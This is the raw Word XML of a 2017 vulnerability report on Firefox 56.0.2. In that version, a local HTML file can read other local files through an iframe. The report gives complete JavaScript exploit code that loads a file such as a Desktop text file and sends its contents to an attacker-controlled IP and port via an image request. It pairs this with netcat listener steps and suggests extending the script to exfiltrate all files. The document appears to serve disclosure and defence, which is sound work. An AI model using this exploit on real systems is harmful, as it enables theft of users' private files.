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B97A" w14:textId="7E5A0B08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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Allowed permission to iframe element will let attackers read sensitive </w:t>
      </w:r>
      <w:r w:rsidR="007E448E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="009B74F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Mozilla Firefox v56.0.2(64-bit)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461A26E8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745364D9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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This vulnerability allows an attacker to access all sensitive file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E50DF7B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3F9A34E5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&lt;Tested on Microsoft Windows 10, 64-bit OS&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EC0C69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0FA4DC1C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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exploit code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CC7FB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13B0CFAA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The exploit code is very simple.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011B5A52" w14:textId="77777777" w:rsidR="009B74F7" w:rsidRPr="009B74F7" w:rsidRDefault="009B74F7" w:rsidP="009B74F7">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116499B0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&lt;meta http-equiv="content-type" content="text/html; charset=utf-8" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68BA9F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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC4841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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FCC9B8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6AD36518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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADA2DF9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2F2284CC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&lt;!-- Dynamically creating an iframe (important part is the onload attribute while will send the innerHTML content to the receive()). Change the file path below. --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4D49B2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6211055B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(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42077024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3265E720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document.body.innerHTML='&lt;html&gt;&lt;body&gt;&lt;center&gt;&lt;h1&gt;Testing &lt;/h1&gt;&lt;/center&gt;&lt;/body&gt;&lt;/html&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A608C7F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var profileIframe = document.createElement('iframe');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA9DC2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profileIframe.setAttribute('src', 'file:///C:/Users/chinmohan/Desktop/openvas.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D82E91B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profileIframe.setAttribute('id', 'pi');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72356B2D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profileIframe.setAttribute("onload", "receive(document.getElementById('pi').contentWindow.document.body.innerHTML)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D8A4C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document.body.appendChild(profileIframe);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8F3D48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0B2ECB6D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})();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3EC707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0C661463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&lt;!-- Dynamically creating an img element which will send the content to my server. Change the IP address and Port number below --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328E053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12329923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function receive(text) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A29840B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65BB79E7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console.log(text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64407FF0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var profileIframe = document.createElement('img');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1978FF0B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profileIframe.setAttribute('src', 'http://&lt;ip address&gt;:&lt;port number&gt;/collect.gif?content='+text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD0F34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document.body.appendChild(profileIframe);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289D1F4D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6858B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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FE04A9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&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C056EBB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7775E3A2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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps to Reproduce-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74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AAA6AE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2DC9192F" w14:textId="77777777" w:rsidR="009B74F7" w:rsidRPr="009B74F7" w:rsidRDefault="009B74F7" w:rsidP="009B74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B74F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Copy a .HTML file on Desktop. Copy the above exploit code and paste it in the file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7EDDB" w14:textId="77777777" w:rsidR="009B74F7" w:rsidRPr="009B74F7" w:rsidRDefault="009B74F7" w:rsidP="009B74F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B74F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Setup a netcat listener in your server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CC9800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F0E8E17" wp14:editId="3C6DAFFE">
            <wp:extent cx="5730875" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="https://lh3.googleusercontent.com/DiUTZD54Nt64S_aZnm6mNX036vDc0ZuWBE2YnQd9usg9AUO57XGymhRw3XbOKwPFhf8QLWRoX8NhsQwoBc3QXsxDPoZZxOjlZ5m1F4K9F95WcVvmY5O5A1vKMI6oYfHa5qq0KS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iUTZD54Nt64S_aZnm6mNX036vDc0ZuWBE2YnQd9usg9AUO57XGymhRw3XbOKwPFhf8QLWRoX8NhsQwoBc3QXsxDPoZZxOjlZ5m1F4K9F95WcVvmY5O5A1vKMI6oYfHa5qq0KS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2B5A" w14:textId="77777777" w:rsidR="009B74F7" w:rsidRPr="009B74F7" w:rsidRDefault="009B74F7" w:rsidP="009B74F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B74F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Open the file using a Firefox browser v56.0.2 (64-bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBFAC9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705807C" wp14:editId="091EED64">
            <wp:extent cx="5730875" cy="3087370"/>
            <wp:effectExtent l="0" t="0" r="9525" b="11430"/>
            <wp:docPr id="2" name="Picture 2" descr="https://lh4.googleusercontent.com/ievsoNWxbOp0jwwmzCm-keF4EQuhJ3ZUgdYO9d6rNRtfb_2M1WKeFMP6OCkISAk1ZKITLpZvP6yOJ-tDgXigpuDY0Y02UeBWdiLxknNvBs0WYERIFU7gLMqb3I9NHZMiyXhEX5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evsoNWxbOp0jwwmzCm-keF4EQuhJ3ZUgdYO9d6rNRtfb_2M1WKeFMP6OCkISAk1ZKITLpZvP6yOJ-tDgXigpuDY0Y02UeBWdiLxknNvBs0WYERIFU7gLMqb3I9NHZMiyXhEX5D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9163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0E266ECA" w14:textId="77777777" w:rsidR="009B74F7" w:rsidRPr="009B74F7" w:rsidRDefault="009B74F7" w:rsidP="009B74F7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B74F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The screenshot of netcat listener is below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7374FD77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285CEBA" wp14:editId="62586E4A">
            <wp:extent cx="5730875" cy="3684905"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="https://lh5.googleusercontent.com/jJrulFl-RvaMAZvGJsZrBCpidlJoKpI_QWGvWZge4EgWWGfMT0oB06NhkzfjjjB8iG3RTc3Olu7WZC1Z2LdejXKam5c3K72CjPLS19Xdn1K1YTgQd-gS-eYjocIIHZvEgFv9h4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JrulFl-RvaMAZvGJsZrBCpidlJoKpI_QWGvWZge4EgWWGfMT0oB06NhkzfjjjB8iG3RTc3Olu7WZC1Z2LdejXKam5c3K72CjPLS19Xdn1K1YTgQd-gS-eYjocIIHZvEgFv9h4J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C65F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52C32C5D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This vulnerability is fixed in most other versions and return the error called “</w:t>
      </w:r>
      <w:r w:rsidRPr="009B74F7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E4F0F5"/>
        </w:rPr>
        <w:t>Error: Permission denied to access property "x"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489BD4F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53304B27" w14:textId="77777777" w:rsidR="009B74F7" w:rsidRPr="009B74F7" w:rsidRDefault="007E448E" w:rsidP="009B74F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="009B74F7" w:rsidRPr="009B74F7">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Property_access_denied</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009B74F7" w:rsidRPr="009B74F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BFEDA2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240C5138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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation and Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794A471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6C754762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Though the protocols have same protocol “file”, parent window should not be allowed to access the iframe element. Else, any sensitive file in the file system can be exfiltrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A406D9D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44BA1958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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Leveraging this vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B21BB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52F9D7D4" w14:textId="77777777" w:rsidR="009B74F7" w:rsidRPr="009B74F7" w:rsidRDefault="009B74F7" w:rsidP="009B74F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B74F7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A small addition to the script can automatically traverse various path and check common file names to automatically extract and exfiltrate all files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D9B223" w14:textId="77777777" w:rsidR="009B74F7" w:rsidRPr="009B74F7" w:rsidRDefault="009B74F7" w:rsidP="009B74F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B93C58E" w14:textId="77777777" w:rsidR="0021730F" w:rsidRDefault="007E448E"/>
    <w:sectPr w:rsidR="0021730F" w:rsidSect="0057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B26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="295C1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93A8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CF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E3D50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDB26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7"/>
    <w:rsid w:val="0057549B"/>
    <w:rsid w:val="007E448E"/>
    <w:rsid w:val="009B74F7"/>
    <w:rsid w:val="009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7C6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4F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eveloper.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Property_access_denie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Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Nayak, Chinmohan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nayak, Chinmohan</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-27T06:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-27T06:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>